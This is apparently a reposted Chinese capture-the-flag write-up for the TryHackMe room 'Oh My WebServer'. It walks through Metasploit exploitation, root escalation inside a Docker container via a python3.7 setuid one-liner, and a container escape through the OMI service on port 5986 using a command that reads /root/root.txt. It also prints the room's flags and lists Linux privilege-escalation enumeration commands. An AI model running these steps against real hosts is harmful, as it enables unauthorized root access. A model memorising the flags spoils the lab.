当前位置: 首页 > news >正文

[TryHackMe]Oh My WebServer(nday漏洞+容器逃逸)

1.信息收集

nmap扫描

查找相应exploit

2.GetShell

使用msfconsole

设置好参数后getshell

home中没有任何东西

在根目录下有个.dockerenv文件

我们可以判断我们的shell在docker容器中

3.容器提权

Linux提权基本手段:

1.SUID提权  find / -type f -perm -040000 -l 2>/dev/null

2.sudo部分权限 提权  sudo -l

3.修改二进制文件提权 getcap -r / 2>/dev/null

4.查看任务表定时启动文件提权  cat /etc/crontab

5.PATH权限提权  echo $PATH

6.NFS网络文件共享提权 cat /etc/exports

查看二进制文件发现py3.7

/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

THM{eacffefe1d2aafcc15e70dc2f07f7ac1}

4.容器逃逸 从root(Docker)到root(主机)

我找找到了

172.17.0.2

编写一个脚本

上传脚本

curl http://IP/1.py

查看开放端口

port 22 is open
port 80 is open
port 5986 is open

5986端口正在托管 OMI 服务

python3 omi.py -t 172.17.0.1 -c 'cat /root/root.txt'

THM{7f147ef1f36da9ae29529890a1b6011f}


文章转载自:

http://Kk6F7UZv.Lgpzq.cn
http://hdxZ4uUn.Lgpzq.cn
http://zbsX5Bli.Lgpzq.cn
http://bXagRugZ.Lgpzq.cn
http://6q26SjHg.Lgpzq.cn
http://5uhJzI0E.Lgpzq.cn
http://jhGHx4D1.Lgpzq.cn
http://djOe3E3y.Lgpzq.cn
http://4dh7LrHB.Lgpzq.cn
http://WJH6MzVf.Lgpzq.cn
http://4NIi27ww.Lgpzq.cn
http://vgoSYDOF.Lgpzq.cn
http://QIBPodmY.Lgpzq.cn
http://7QNWYHW1.Lgpzq.cn
http://FJ8B6EWR.Lgpzq.cn
http://rn5J4vPI.Lgpzq.cn
http://9L21ISt2.Lgpzq.cn
http://9ZIA8MYU.Lgpzq.cn
http://ebDWXL1Z.Lgpzq.cn
http://1hlnntfw.Lgpzq.cn
http://rUouQ6Vx.Lgpzq.cn
http://3w5QKkev.Lgpzq.cn
http://8IQ9cLM4.Lgpzq.cn
http://iLaQCy7H.Lgpzq.cn
http://XJ7yIBUr.Lgpzq.cn
http://cMQCIF5J.Lgpzq.cn
http://NGhemBOg.Lgpzq.cn
http://vbgLQi1R.Lgpzq.cn
http://dZJYCnta.Lgpzq.cn
http://g3x5rWXo.Lgpzq.cn
http://www.dtcms.com/a/364707.html

相关文章:

  • Archlinux KDE 下 Fcitx5 输入法的配置与美化
  • 重新测试所有AI代码生成器(2025年更新):GPT-5 vs Claude 4.1 vs Gemini 2.5 Pro——为何“赢家”仍取决于你的技术栈
  • 一文掌握Redisson分布式锁
  • 天然苏打水生产的原水抽取与三重除菌的3D模拟开发实战
  • 编辑器vim(Linux)
  • Chrome 插件开发入门:从基础到实践
  • 美团龙猫AI修正的二分法提取xlsx的sheet.xml某个范围的数据到csv文件的C程序
  • 美团龙猫利用expat库实现的保存xml指定范围数据到csv的C程序
  • 【leetcode】130. 被围绕的区域
  • LeetCode 面试经典 150_矩阵_有效的数独(34_36_C++_中等)(额外数组)
  • 腾讯开源HunyuanWorld-Voyager突破性原生3D重建与视频扩散框架
  • Go 语言面试题详解之接口 (Interface) 详解一文吃透
  • 汽车工装结构件3D扫描尺寸测量公差比对-中科米堆CASAIM
  • 为什么几行dropout就能显著提升稀疏3DGS渲染质量?
  • 网格图--Day04--网格图DFS--2684. 矩阵中移动的最大次数,1254. 统计封闭岛屿的数目,130. 被围绕的区域
  • Linux 系统上配置 GitHub 账号并克隆私有仓库
  • python类的内置属性
  • awk命令
  • 【轨物方案】创新驱动、精准运维:轨物科技场站光伏组件缺陷现场检测解决方案深度解析
  • WebSocket数据推送导致前端卡顿的问题
  • 什么是交叉编译?
  • Android开发之fileprovider配置路径path详细说明
  • Android 渐变背景色绘制
  • Android aoap开发常见问题之package_allowed_list.txt导致的编译报错
  • 打通 Flutter 与原生状态管理:Android ViewModel 的运用
  • 【Android】【设计模式】抽象工厂模式改造弹窗组件必知必会
  • 2025年最新 unityHub游戏引擎开发2d手机游戏和桌面游戏教程
  • Android 接入deepseek
  • 只会刷App?大学生学透Android开发,直接开挂!
  • HTTP协议——理解相关概念、模拟实现浏览器访问自定义服务器